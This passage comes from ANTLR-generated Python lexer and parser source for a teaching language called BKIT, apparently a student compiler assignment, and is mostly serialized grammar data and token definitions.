buf.write(\"\\u014b\\5!\\21\\2\\u014b:\\3\\2\\2\\2\\u014c\\u014f\\5c\\62\\2\\u014d\")\n buf.write(\"\\u014f\\5e\\63\\2\\u014e\\u014c\\3\\2\\2\\2\\u014e\\u014d\\3\\2\\2\\2\")\n buf.write(\"\\u014f<\\3\\2\\2\\2\\u0150\\u0154\\7$\\2\\2\\u0151\\u0153\\5)\\25\\2\")\n buf.write(\"\\u0152\\u0151\\3\\2\\2\\2\\u0153\\u0156\\3\\2\\2\\2\\u0154\\u0152\\3\")\n buf.write(\"\\2\\2\\2\\u0154\\u0155\\3\\2\\2\\2\\u0155\\u0157\\3\\2\\2\\2\\u0156\\u0154\")\n buf.write(\"\\3\\2\\2\\2\\u0157\\u0158\\7$\\2\\2\\u0158\\u0159\\b\\37\\3\\2\\u0159\")\n buf.write(\">\\3\\2\\2\\2\\u015a\\u015b\\7D\\2\\2\\u015b\\u015c\\7q\\2\\2\\u015c\")\n buf.write(\"\\u015d\\7f\\2\\2\\u015d\\u015e\\7{\\2\\2\\u015e@\\3\\2\\2\\2\\u015f\")\n buf.write(\"\\u0160\\7D\\2\\2\\u0160\\u0161\\7t\\2\\2\\u0161\\u0162\\7g\\2\\2\\u0162\")\n buf.write(\"\\u0163\\7c\\2\\2\\u0163\\u0164\\7m\\2\\2\\u0164B\\3\\2\\2\\2\\u0165\")\n buf.write(\"\\u0166\\7E\\2\\2\\u0166\\u0167\\7q\\2\\2\\u0167\\u0168\\7p\\2\\2\\u0168\")\n buf.write(\"\\u0169\\7v\\2\\2\\u0169\\u016a\\7k\\2\\2\\u016a\\u016b\\7p\\2\\2\\u016b\")\n buf.write(\"\\u016c\\7w\\2\\2\\u016c\\u016d\\7g\\2\\2\\u016dD\\3\\2\\2\\2\\u016e\")\n buf.write(\"\\u016f\\7F\\2\\2\\u016f\\u0170\\7q\\2\\2\\u0170F\\3\\2\\2\\2\\u0171\")\n buf.write(\"\\u0172\\7G\\2\\2\\u0172\\u0173\\7n\\2\\2\\u0173\\u0174\\7u\\2\\2\\u0174\")\n buf.write(\"\\u0175\\7g\\2\\2\\u0175H\\3\\2\\2\\2\\u0176\\u0177\\7G\\2\\2\\u0177\")\n buf.write(\"\\u0178\\7n\\2\\2\\u0178\\u0179\\7U\\2\\2\\u0179\\u017a\\7g\\2\\2\\u017a\")\n buf.write(\"\\u017b\\7n\\2\\2\\u017b\\u017c\\7h\\2\\2\\u017cJ\\3\\2\\2\\2\\u017d\")\n buf.write(\"\\u017e\\7G\\2\\2\\u017e\\u017f\\7n\\2\\2\\u017f\\u0180\\7u\\2\\2\\u0180\")\n buf.write(\"\\u0181\\7g\\2\\2\\u0181\\u0182\\7K\\2\\2\\u0182\\u0183\\7h\\2\\2\\u0183\")\n buf.write(\"L\\3\\2\\2\\2\\u0184\\u0185\\7G\\2\\2\\u0185\\u0186\\7p\\2\\2\\u0186\")\n buf.write(\"\\u0187\\7f\\2\\2\\u0187\\u0188\\7K\\2\\2\\u0188\\u0189\\7h\\2\\2\\u0189\")\n buf.write(\"N\\3\\2\\2\\2\\u018a\\u018b\\7G\\2\\2\\u018b\\u018c\\7p\\2\\2\\u018c\")\n buf.write(\"\\u018d\\7f\\2\\2\\u018d\\u018e\\7H\\2\\2\\u018e\\u018f\\7q\\2\\2\\u018f\")\n buf.write(\"\\u0190\\7t\\2\\2\\u0190P\\3\\2\\2\\2\\u0191\\u0192\\7G\\2\\2\\u0192\")\n buf.write(\"\\u0193\\7p\\2\\2\\u0193\\u0194\\7f\\2\\2\\u0194\\u0195\\7Y\\2\\2\\u0195\")\n buf.write(\"\\u0196\\7j\\2\\2\\u0196\\u0197\\7k\\2\\2\\u0197\\u0198\\7n\\2\\2\\u0198\")\n buf.write(\"\\u0199\\7g\\2\\2\\u0199R\\3\\2\\2\\2\\u019a\\u019b\\7H\\2\\2\\u019b\")\n buf.write(\"\\u019c\\7q\\2\\2\\u019c\\u019d\\7t\\2\\2\\u019dT\\3\\2\\2\\2\\u019e\")\n buf.write(\"\\u019f\\7H\\2\\2\\u019f\\u01a0\\7w\\2\\2\\u01a0\\u01a1\\7p\\2\\2\\u01a1\")\n buf.write(\"\\u01a2\\7e\\2\\2\\u01a2\\u01a3\\7v\\2\\2\\u01a3\\u01a4\\7k\\2\\2\\u01a4\")\n buf.write(\"\\u01a5\\7q\\2\\2\\u01a5\\u01a6\\7p\\2\\2\\u01a6V\\3\\2\\2\\2\\u01a7\")\n buf.write(\"\\u01a8\\7K\\2\\2\\u01a8\\u01a9\\7h\\2\\2\\u01a9X\\3\\2\\2\\2\\u01aa\")\n buf.write(\"\\u01ab\\7R\\2\\2\\u01ab\\u01ac\\7c\\2\\2\\u01ac\\u01ad\\7t\\2\\2\\u01ad\")\n buf.write(\"\\u01ae\\7c\\2\\2\\u01ae\\u01af\\7o\\2\\2\\u01af\\u01b0\\7g\\2\\2\\u01b0\")\n buf.write(\"\\u01b1\\7v\\2\\2\\u01b1\\u01b2\\7g\\2\\2\\u01b2\\u01b3\\7t\\2\\2\\u01b3\")\n buf.write(\"Z\\3\\2\\2\\2\\u01b4\\u01b5\\7T\\2\\2\\u01b5\\u01b6\\7g\\2\\2\\u01b6\")\n buf.write(\"\\u01b7\\7v\\2\\2\\u01b7\\u01b8\\7w\\2\\2\\u01b8\\u01b9\\7t\\2\\2\\u01b9\")\n buf.write(\"\\u01ba\\7p\\2\\2\\u01ba\\\\\\3\\2\\2\\2\\u01bb\\u01bc\\7V\\2\\2\\u01bc\")\n buf.write(\"\\u01bd\\7j\\2\\2\\u01bd\\u01be\\7g\\2\\2\\u01be\\u01bf\\7p\\2\\2\\u01bf\")\n buf.write(\"^\\3\\2\\2\\2\\u01c0\\u01c1\\7X\\2\\2\\u01c1\\u01c2\\7c\\2\\2\\u01c2\")\n buf.write(\"\\u01c3\\7t\\2\\2\\u01c3`\\3\\2\\2\\2\\u01c4\\u01c5\\7Y\\2\\2\\u01c5\")\n buf.write(\"\\u01c6\\7j\\2\\2\\u01c6\\u01c7\\7k\\2\\2\\u01c7\\u01c8\\7n\\2\\2\\u01c8\")\n buf.write(\"\\u01c9\\7g\\2\\2\\u01c9b\\3\\2\\2\\2\\u01ca\\u01cb\\7V\\2\\2\\u01cb\")\n buf.write(\"\\u01cc\\7t\\2\\2\\u01cc\\u01cd\\7w\\2\\2\\u01cd\\u01ce\\7g\\2\\2\\u01ce\")\n buf.write(\"d\\3\\2\\2\\2\\u01cf\\u01d0\\7H\\2\\2\\u01d0\\u01d1\\7c\\2\\2\\u01d1\")\n buf.write(\"\\u01d2\\7n\\2\\2\\u01d2\\u01d3\\7u\\2\\2\\u01d3\\u01d4\\7g\\2\\2\\u01d4\")\n buf.write(\"f\\3\\2\\2\\2\\u01d5\\u01d6\\7G\\2\\2\\u01d6\\u01d7\\7p\\2\\2\\u01d7\")\n buf.write(\"\\u01d8\\7f\\2\\2\\u01d8\\u01d9\\7F\\2\\2\\u01d9\\u01da\\7q\\2\\2\\u01da\")\n buf.write(\"h\\3\\2\\2\\2\\u01db\\u01dc\\7-\\2\\2\\u01dcj\\3\\2\\2\\2\\u01dd\\u01de\")\n buf.write(\"\\7-\\2\\2\\u01de\\u01df\\7\\60\\2\\2\\u01dfl\\3\\2\\2\\2\\u01e0\\u01e1\")\n buf.write(\"\\7/\\2\\2\\u01e1n\\3\\2\\2\\2\\u01e2\\u01e3\\7/\\2\\2\\u01e3\\u01e4\")\n buf.write(\"\\7\\60\\2\\2\\u01e4p\\3\\2\\2\\2\\u01e5\\u01e6\\7,\\2\\2\\u01e6r\\3\\2\")\n buf.write(\"\\2\\2\\u01e7\\u01e8\\7,\\2\\2\\u01e8\\u01e9\\7\\60\\2\\2\\u01e9t\\3\")\n buf.write(\"\\2\\2\\2\\u01ea\\u01eb\\7^\\2\\2\\u01ebv\\3\\2\\2\\2\\u01ec\\u01ed\\7\")\n buf.write(\"^\\2\\2\\u01ed\\u01ee\\7\\60\\2\\2\\u01eex\\3\\2\\2\\2\\u01ef\\u01f0\")\n buf.write(\"\\7\\'\\2\\2\\u01f0z\\3\\2\\2\\2\\u01f1\\u01f2\\7#\\2\\2\\u01f2|\\3\\2\")\n buf.write(\"\\2\\2\\u01f3\\u01f4\\7(\\2\\2\\u01f4\\u01f5\\7(\\2\\2\\u01f5~\\3\\2\")\n buf.write(\"\\2\\2\\u01f6\\u01f7\\7~\\2\\2\\u01f7\\u01f8\\7~\\2\\2\\u01f8\\u0080\")\n buf.write(\"\\3\\2\\2\\2\\u01f9\\u01fa\\7?\\2\\2\\u01fa\\u01fb\\7?\\2\\2\\u01fb\\u0082\")\n buf.write(\"\\3\\2\\2\\2\\u01fc\\u01fd\\7#\\2\\2\\u01fd\\u01fe\\7?\\2\\2\\u01fe\\u0084\")\n buf.write(\"\\3\\2\\2\\2\\u01ff\\u0200\\7>\\2\\2\\u0200\\u0086\\3\\2\\2\\2\\u0201\")\n buf.write(\"\\u0202\\7@\\2\\2\\u0202\\u0088\\3\\2\\2\\2\\u0203\\u0204\\7>\\2\\2\\u0204\")\n buf.write(\"\\u0205\\7?\\2\\2\\u0205\\u008a\\3\\2\\2\\2\\u0206\\u0207\\7@\\2\\2\\u0207\")\n buf.write(\"\\u0208\\7?\\2\\2\\u0208\\u008c\\3\\2\\2\\2\\u0209\\u020a\\7?\\2\\2\\u020a\")\n buf.write(\"\\u020b\\7^\\2\\2\\u020b\\u020c\\7?\\2\\2\\u020c\\u008e\\3\\2\\2\\2\\u020d\")\n buf.write(\"\\u020e\\7>\\2\\2\\u020e\\u020f\\7\\60\\2\\2\\u020f\\u0090\\3\\2\\2\\2\")\n buf.write(\"\\u0210\\u0211\\7@\\2\\2\\u0211\\u0212\\7\\60\\2\\2\\u0212\\u0092\\3\")\n buf.write(\"\\2\\2\\2\\u0213\\u0214\\7>\\2\\2\\u0214\\u0215\\7?\\2\\2\\u0215\\u0216\")\n buf.write(\"\\7\\60\\2\\2\\u0216\\u0094\\3\\2\\2\\2\\u0217\\u0218\\7@\\2\\2\\u0218\")\n buf.write(\"\\u0219\\7?\\2\\2\\u0219\\u021a\\7\\60\\2\\2\\u021a\\u0096\\3\\2\\2\\2\")\n buf.write(\"\\u021b\\u021c\\7*\\2\\2\\u021c\\u0098\\3\\2\\2\\2\\u021d\\u021e\\7\")\n buf.write(\"+\\2\\2\\u021e\\u009a\\3\\2\\2\\2\\u021f\\u0220\\7]\\2\\2\\u0220\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u0221\\u0222\\7_\\2\\2\\u0222\\u009e\\3\\2\\2\\2\\u0223\")\n buf.write(\"\\u0224\\7}\\2\\2\\u0224\\u00a0\\3\\2\\2\\2\\u0225\\u0226\\7\\177\\2\")\n buf.write(\"\\2\\u0226\\u00a2\\3\\2\\2\\2\\u0227\\u0228\\7<\\2\\2\\u0228\\u00a4\")\n buf.write(\"\\3\\2\\2\\2\\u0229\\u022a\\7\\60\\2\\2\\u022a\\u00a6\\3\\2\\2\\2\\u022b\")\n buf.write(\"\\u022c\\7=\\2\\2\\u022c\\u00a8\\3\\2\\2\\2\\u022d\\u022e\\7.\\2\\2\\u022e\")\n buf.write(\"\\u00aa\\3\\2\\2\\2\\34\\2\\u00b1\\u00b3\\u00ba\\u00c3\\u00c7\\u00cf\")\n buf.write(\"\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\\u0109\\u010d\\u0110\")\n buf.write(\"\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0143\\u0148\\u014e\")\n buf.write(\"\\u0154\\4\\b\\2\\2\\3\\37\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n REAL_NUMBER = 1\n ID = 2\n ILLEGAL_ESCAPE = 3\n UNCLOSE_STRING = 4\n COMMENT = 5\n UNTERMINATED_COMMENT = 6\n ERROR_CHAR = 7\n WS = 8\n Literal = 9\n Integer_literal = 10\n Float_literal = 11\n Boolean_literal = 12\n String_literal = 13\n BODY = 14\n BREAK = 15\n CONTINUE = 16\n DO = 17\n ELSE = 18\n ELSELF = 19\n ELSEIF = 20\n ENDBODY = 21\n ENDFOR = 22\n ENDWHILE = 23\n FOR = 24\n FUNCTION = 25\n IF = 26\n PARAMETER = 27\n RETURN = 28\n THEN = 29\n VAR = 30\n WHILE = 31\n TRUE = 32\n FALSE = 33\n ENDDO = 34\n PLUS_INT = 35\n PLUS_FLOAT = 36\n MINUS_INT = 37\n MINUS_FLOAT = 38\n STAR_INT = 39\n STAR_FLOAT = 40\n DIV_INT = 41\n DIV_FLOAT = 42\n MOD = 43\n NOT = 44\n AND = 45\n OR = 46\n EQUAL = 47\n NOT_EQUAL_INT = 48\n LESS_INT = 49\n GREATER_INT = 50\n LESS_OR_EQUAL_INT = 51\n GREATER_OR_EQUAL_INT = 52\n NOT_EQUAL_FLOAT = 53\n LESS_FLOAT = 54\n GREATER_FLOAT = 55\n LESS_OR_EQUAL_FLOAT = 56\n GREATER_OR_EQUAL_FLOAT = 57\n LEFT_PAREN = 58\n RIGHT_PARENT = 59\n LEFT_BRACKET = 60\n RIGHT_BRACKET = 61\n LEFT_BRACE = 62\n RIGHT_BRACE = 63\n COLON = 64\n DOT = 65\n SEMI = 66\n COMMA = 67\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElSelf'\", \n \"'ElseIf'\", \"'EndIf'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=\\\\='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \"Literal\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n ruleNames = [ \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \n \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\", \n \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SIGN\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Literal\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \n \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \n \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[29] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n print(\"what the fuck: \", self.text)\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.49111613631248474, "alphanum_fraction": 0.5538291931152344, "avg_line_length": 33.306148529052734, "blob_id": "3438cf45f827e1de72956edd49fa36c27cd9ae1d", "content_id": "ce6d7cab072cf7506f8648048464646011a91fa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102658, "license_type": "no_license", "max_line_length": 455, "num_lines": 2992, "path": "/Assignments/assignment1/src/forJava/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment1/src/forJava/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01a0\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\3\\2\\3\\2\\3\\2\\7\\2Z\\n\\2\")\n buf.write(\"\\f\\2\\16\\2]\\13\\2\\3\\2\\7\\2`\\n\\2\\f\\2\\16\\2c\\13\\2\\3\\2\\3\\2\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4q\\n\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\")\n buf.write(\"\\3\\b\\3\\b\\5\\b\\u0084\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u0089\\n\\b\\7\\b\\u008b\")\n buf.write(\"\\n\\b\\f\\b\\16\\b\\u008e\\13\\b\\3\\b\\3\\b\\3\\t\\3\\t\\5\\t\\u0094\\n\\t\")\n buf.write(\"\\3\\t\\3\\t\\3\\t\\5\\t\\u0099\\n\\t\\7\\t\\u009b\\n\\t\\f\\t\\16\\t\\u009e\")\n buf.write(\"\\13\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\13\\3\\13\\6\\13\\u00a6\\n\\13\\r\\13\")\n buf.write(\"\\16\\13\\u00a7\\3\\13\\5\\13\\u00ab\\n\\13\\3\\f\\3\\f\\3\\f\\3\\f\\5\\f\")\n buf.write(\"\\u00b1\\n\\f\\3\\f\\6\\f\\u00b4\\n\\f\\r\\f\\16\\f\\u00b5\\3\\r\\3\\r\\5\")\n buf.write(\"\\r\\u00ba\\n\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u00bf\\n\\r\\3\\16\\3\\16\\3\\16\")\n buf.write(\"\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\20\\3\\20\\3\\20\\7\\20\\u00cc\\n\")\n buf.write(\"\\20\\f\\20\\16\\20\\u00cf\\13\\20\\3\\21\\3\\21\\3\\21\\7\\21\\u00d4\\n\")\n buf.write(\"\\21\\f\\21\\16\\21\\u00d7\\13\\21\\3\\21\\7\\21\\u00da\\n\\21\\f\\21\\16\")\n buf.write(\"\\21\\u00dd\\13\\21\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\5\\22\\u00f2\\n\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\")\n buf.write(\"\\23\\3\\23\\7\\23\\u00fd\\n\\23\\f\\23\\16\\23\\u0100\\13\\23\\3\\23\\3\")\n buf.write(\"\\23\\5\\23\\u0104\\n\\23\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\")\n buf.write(\"\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\27\\3\\27\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\")\n buf.write(\"\\3\\33\\3\\33\\3\\34\\3\\34\\5\\34\\u0132\\n\\34\\3\\35\\3\\35\\3\\35\\3\")\n buf.write(\"\\35\\3\\36\\3\\36\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\5 \\u0141\\n \\3!\")\n buf.write(\"\\3!\\3!\\3!\\3!\\3!\\7!\\u0149\\n!\\f!\\16!\\u014c\\13!\\3\\\"\\3\\\"\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\7\\\"\\u0154\\n\\\"\\f\\\"\\16\\\"\\u0157\\13\\\"\\3#\\3\")\n buf.write(\"#\\3#\\3#\\3#\\3#\\7#\\u015f\\n#\\f#\\16#\\u0162\\13#\\3$\\3$\\3$\\5\")\n buf.write(\"$\\u0167\\n$\\3%\\3%\\3%\\5%\\u016c\\n%\\3&\\3&\\3&\\3&\\5&\\u0172\\n\")\n buf.write(\"&\\3\\'\\3\\'\\5\\'\\u0176\\n\\'\\3(\\3(\\3(\\3(\\3(\\5(\\u017d\\n(\\3)\")\n buf.write(\"\\3)\\3)\\5)\\u0182\\n)\\3*\\3*\\3*\\3*\\3*\\7*\\u0189\\n*\\f*\\16*\\u018c\")\n buf.write(\"\\13*\\7*\\u018e\\n*\\f*\\16*\\u0191\\13*\\3*\\3*\\3+\\3+\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3+\\5+\\u019e\\n+\\3+\\2\\5@BD,\\2\\4\\6\\b\\n\\f\\16\\20\")\n buf.write(\"\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668:<>@BDFHJL\")\n buf.write(\"NPRT\\2\\b\\3\\2\\4\\7\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\4\\2!!#%\\3\\2\\37\")\n buf.write(\" \\2\\u01a0\\2[\\3\\2\\2\\2\\4f\\3\\2\\2\\2\\6j\\3\\2\\2\\2\\bx\\3\\2\\2\\2\")\n buf.write(\"\\n|\\3\\2\\2\\2\\f~\\3\\2\\2\\2\\16\\u0080\\3\\2\\2\\2\\20\\u0093\\3\\2\\2\")\n buf.write(\"\\2\\22\\u009f\\3\\2\\2\\2\\24\\u00aa\\3\\2\\2\\2\\26\\u00ac\\3\\2\\2\\2\")\n buf.write(\"\\30\\u00b9\\3\\2\\2\\2\\32\\u00c0\\3\\2\\2\\2\\34\\u00c4\\3\\2\\2\\2\\36\")\n buf.write(\"\\u00c8\\3\\2\\2\\2 \\u00d5\\3\\2\\2\\2\\\"\\u00f1\\3\\2\\2\\2$\\u00f3\\3\")\n buf.write(\"\\2\\2\\2&\\u0108\\3\\2\\2\\2(\\u010a\\3\\2\\2\\2*\\u0117\\3\\2\\2\\2,\\u011e\")\n buf.write(\"\\3\\2\\2\\2.\\u0125\\3\\2\\2\\2\\60\\u0129\\3\\2\\2\\2\\62\\u012b\\3\\2\")\n buf.write(\"\\2\\2\\64\\u012d\\3\\2\\2\\2\\66\\u012f\\3\\2\\2\\28\\u0133\\3\\2\\2\\2\")\n buf.write(\":\\u0137\\3\\2\\2\\2<\\u0139\\3\\2\\2\\2>\\u0140\\3\\2\\2\\2@\\u0142\\3\")\n buf.write(\"\\2\\2\\2B\\u014d\\3\\2\\2\\2D\\u0158\\3\\2\\2\\2F\\u0166\\3\\2\\2\\2H\\u016b\")\n buf.write(\"\\3\\2\\2\\2J\\u0171\\3\\2\\2\\2L\\u0175\\3\\2\\2\\2N\\u017c\\3\\2\\2\\2\")\n buf.write(\"P\\u0181\\3\\2\\2\\2R\\u0183\\3\\2\\2\\2T\\u019d\\3\\2\\2\\2VW\\5\\4\\3\")\n buf.write(\"\\2WX\\7<\\2\\2XZ\\3\\2\\2\\2YV\\3\\2\\2\\2Z]\\3\\2\\2\\2[Y\\3\\2\\2\\2[\\\\\")\n buf.write(\"\\3\\2\\2\\2\\\\a\\3\\2\\2\\2][\\3\\2\\2\\2^`\\5\\6\\4\\2_^\\3\\2\\2\\2`c\\3\")\n buf.write(\"\\2\\2\\2a_\\3\\2\\2\\2ab\\3\\2\\2\\2bd\\3\\2\\2\\2ca\\3\\2\\2\\2de\\7\\2\\2\")\n buf.write(\"\\3e\\3\\3\\2\\2\\2fg\\7\\30\\2\\2gh\\7:\\2\\2hi\\5\\20\\t\\2i\\5\\3\\2\\2\")\n buf.write(\"\\2jk\\7\\23\\2\\2kl\\7:\\2\\2lp\\7\\3\\2\\2mn\\7\\25\\2\\2no\\7:\\2\\2o\")\n buf.write(\"q\\5\\36\\20\\2pm\\3\\2\\2\\2pq\\3\\2\\2\\2qr\\3\\2\\2\\2rs\\7\\b\\2\\2st\")\n buf.write(\"\\7:\\2\\2tu\\5 \\21\\2uv\\7\\17\\2\\2vw\\7;\\2\\2w\\7\\3\\2\\2\\2xy\\7\\3\")\n buf.write(\"\\2\\2yz\\7>\\2\\2z{\\5\\16\\b\\2{\\t\\3\\2\\2\\2|}\\t\\2\\2\\2}\\13\\3\\2\")\n 